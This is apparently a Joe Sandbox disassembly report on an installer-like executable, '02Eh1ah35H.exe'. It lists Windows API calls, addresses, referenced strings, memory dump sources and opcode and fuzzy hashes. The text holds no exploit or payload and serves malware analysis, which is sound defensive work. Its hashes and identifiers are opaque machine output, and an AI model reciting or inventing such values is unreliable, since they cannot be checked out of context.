                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004053A1
                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004053B3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                                                                                                                                • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                                                                                                                                                                • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                                                                                                                                                                APIs
                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004045E3
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404604
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404686
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404705
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404721
                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                • String ID: Call$N$zD@
                                                                                                                                                                                • API String ID: 3103080414-4182535457
                                                                                                                                                                                • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                                                                                                                                • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                                                                                                                                                                • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                                                                                                                                                  • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                                                                                                                  • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                                                                                                                                                                • wsprintfA.USER32 ref: 004060B9
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                                                                                                                                                  • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                  • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                                                                                                                                                • API String ID: 2171350718-2304911260
                                                                                                                                                                                • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                                                                                                                                • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                                                                                                                                • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                                                                                                                                                                APIs
                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                • String ID: F
                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                                                                                                                                • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                                                                                                                                • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                • CharPrevW.USER32(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                                                                                                                                Strings
                                                                                                                                                                                • *?|<>/":, xrefs: 004066EF
                                                                                                                                                                                • "C:\Users\user\Desktop\02Eh1ah35H.exe", xrefs: 0040669D
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 589700163-2108849867
                                                                                                                                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00404406
                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404412
                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 0040441E
                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404431
                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404441
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040445B
                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404465
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                                                                                                                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                                                                                                  • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                                                                                                                                • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404D22
                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D3C
                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                • String ID: f
                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                                                                                                • MulDiv.KERNEL32(0006BA15,00000064,0006BC19), ref: 00402F74
                                                                                                                                                                                • wsprintfW.USER32 ref: 00402F84
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                                                                                                Strings
                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF121B: GlobalAlloc.KERNEL32(00000040,?,6FDF123B,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF1225
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF26A3
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF26D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF2522
                                                                                                                                                                                  • Part of subcall function 6FDF122C: lstrcpynW.KERNEL32(00000000,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF123C
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6FDF24A8
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FDF24C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                                                                • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                                                                                                • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                                                                                                                                                                • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                                                                                                • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                                                                                                                                                                APIs
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF1635
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF163C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF1650
                                                                                                                                                                                • GetProcAddress.KERNEL32(6FDF2238,00000000), ref: 6FDF1657
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1660
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                                                • Opcode ID: fd854546572e81d71d70b6380b032d46dca6a6b18e90ff225aaa09903df1e1e5
                                                                                                                                                                                • Instruction ID: ee4e13965ae85754bb26e25bb954ca5065b126b2a8c893a560a6522393abaa7b
                                                                                                                                                                                • Opcode Fuzzy Hash: fd854546572e81d71d70b6380b032d46dca6a6b18e90ff225aaa09903df1e1e5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF01C722075387BEA2016AADD4CC9BBE9CEF8B2F6B150211F6289219086615D11E7F1
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                • String ID: !
                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                                                                                                                                • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                                                                                                                                • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                                                                                                                • wsprintfW.USER32 ref: 00404C9B
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                                                                                                                                • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                                                                                                                                                                • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                                                                                                                                • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
